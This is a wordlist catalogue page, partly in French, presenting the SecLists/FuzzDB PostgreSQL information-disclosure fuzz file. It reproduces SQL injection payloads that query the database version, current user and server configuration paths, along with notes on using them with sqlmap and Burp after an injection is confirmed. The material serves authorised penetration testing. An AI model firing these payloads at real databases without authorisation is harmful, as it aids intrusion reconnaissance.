PostgreSQL Enumeration (FuzzDB)

# info disclosure payload fuzzfile for pgsql select version(); select current_database(); select current_user; select session_user; select current_setting('log_connections'); select current_setting('log_statement'); select current_setting('port'); select current_setting('password_encryption'); select current_setting('krb_server_keyfile'); select current_setting('virtual_host'); select current_setting('port'); select current_setting('config_file'); select current_setting('hba_file'); select current_setting('data_directory');

Instructions SELECT de divulgation d'informations pour PostgreSQL permettant d'énumérer la version, l'utilisateur/la base courante et les paramètres du serveur une fois l'injection confirmée. Utile après détection sur des back ends Postgres.

Cette liste est orientée vers le fuzzing d'entrées et la découverte de vulnérabilités. Elle pèse environ 693 B et s'associe bien avec des outils tels que sqlmap, burp. Choisissez la plus petite liste adaptée à votre mission : les listes plus courtes sont plus rapides et plus discrètes pour les attaques en ligne, tandis que les listes plus volumineuses offrent une couverture plus large pour le travail hors ligne où la vitesse est moins contraignante.

Vous pouvez copier l'aperçu d'exemple directement depuis cette page, copier la liste entière dans votre presse-papiers, ou télécharger le fichier .txt brut. La liste complète est servie directement depuis sa source d'origine sur GitHub.

Provient de danielmiessler/SecLists et distribuée sous licence MIT. N'utilisez les wordlists que contre des systèmes que vous êtes explicitement autorisé à tester.

Aperçu